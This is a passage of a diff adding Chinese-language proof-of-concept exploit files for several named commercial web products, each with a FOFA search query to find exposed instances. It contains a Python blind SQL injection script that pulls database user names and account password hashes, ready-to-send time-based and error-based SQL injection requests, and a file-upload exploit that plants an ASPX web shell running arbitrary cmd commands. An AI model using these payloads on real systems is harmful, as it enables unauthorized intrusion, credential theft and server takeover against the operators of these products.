+method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1
+```
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png)
+
+
+
+## Python脚本
+
+```python
+import argparse
+
+import requests
+
+header = {
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
+}
+
+
+def exploit_user(url,db_user):
+    global header
+    user_name = ""
+    for i in range(1, 20):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format(
+                    i, mid)
+            }
+            res = requests.post(url, data=send_data, headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        if mid <= 1 or mid >= 254:
+            break
+        user_name = user_name + chr(mid - 1)
+        print("[+]user_name:{}".format(user_name))
+        print("\033[F", end="")
+    print("[+]user_name:{}".format(user_name))
+def exploit(url,username):
+    global header
+    password_len = 32
+    password = ""
+    for i in range(1,password_len+1):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format(
+                    username,i, mid)
+            }
+            res = requests.post(url,data=send_data,headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        password = password + chr(mid-1)
+        print("[+]password:{}".format(password))
+        print("\033[F",end="")
+    print("[+]password:{}".format(password))
+
+def scan_vuln(url,username,db_user):
+    global header
+    req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
+
+    step_data = {
+        "method":"saveICare",
+        "fdId:"","
+        "fdNum":"1",
+        "docSubject":"1",
+        "fdName":"test",
+        "createTime":"1",
+        "fdStatus":"1"
+    }
+    try:
+        req1 = requests.post(req_url,data=step_data,headers=header)
+        if req1.status_code == 200 and "result" in req1.text:
+            print("[+]Vuln exist，start inject password:")
+            if db_user == "check":
+                exploit_user(req_url,db_user)
+            else:
+                exploit(req_url,username)
+        else:
+            print("[-]Vuln not exist.")
+            exit(0)
+    except:
+        print("[-]request error.")
+        exit(0)
+        pass
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Process command line arguments")
+    parser.add_argument('-u', '--url', required=True, help='Target URL')
+    parser.add_argument('-db_user', '--db_user', required=False, help='db_user')
+    parser.add_argument('-U', '--username', required=False, help='Username argument')
+
+    args = parser.parse_args()
+
+    url = args.url
+    db_user = args.db_user
+    username = args.username
+    scan_vuln(url, username, db_user)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD

虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md

@@ -0,0 +1,25 @@
+# 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞
+
+虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="userReg/initUserReg.do"
+```
+
+## poc
+```javascript
+POST /dlp/userReg/pushSetup.do HTTP/1.1
+Host: 
+Priority: u=4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+setupName={{urlescape(1' AND (SELECT 6789 FROM (SELECT(SLEEP(5)))nxdq) AND 'vpUG'='vpUG)}}
+```
+
+![image-20241227223225696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272232761.png)

西联软件/西联软件移动门店管理系统treamToFile文件上传漏洞.md

@@ -0,0 +1,59 @@
+# 西联软件移动门店管理系统treamToFile文件上传漏洞
+
+西联软件-移动门店管理系统 StreamToFile 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+```javascript
+body="西联软件提供云计算服务"
+```
+
+## poc
+```javascript
+POST /api/UploadDB/StreamToFile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Connection: close
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="organ"
+
+qwert
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="devid"
+
+yuiop
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; name="files";filename="1.aspx"
+Content-Type: image/png
+
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var c=new System.Diagnostics.ProcessStartInfo("cmd");
+var e=new System.Diagnostics.Process();
+var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+c.UseShellExecute=false;
+c.RedirectStandardOutput=true;
+c.RedirectStandardError=true;
+e.StartInfo=c;
+c.Arguments="/c " + Request.Item["cmd"];
+e.Start();
+out=e.StandardOutput;
+EI=e.StandardError;
+e.Close();
+Response.Write(out.ReadToEnd() + EI.ReadToEnd());
+System.IO.File.Delete(Request.PhysicalPath);
+Response.End();%>
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![image-20241227221622454](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272216534.png)
+
+文件路径
+
+```
+/Files/DB/qwert_yuiop.aspx?cmd=dir
+```
+

赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md

@@ -0,0 +1,25 @@
+# 赛诸葛数字化智能中台系统login存在SQL注入漏洞
+
+赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="static/index/image/login_left.png" || icon_hash="1056416905"
+```
+
+## poc
+```javascript
+POST /login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+username=1')) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(3469=3469,version()))),0x7e),3469) AND (('fOfY'='fOfY&loginType=1&password=bbb8aae57c104cda40c93843ad5e6db8&phone_head=86&wx_openid=&member=
+```
+
+![image-20241227221000969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272210041.png)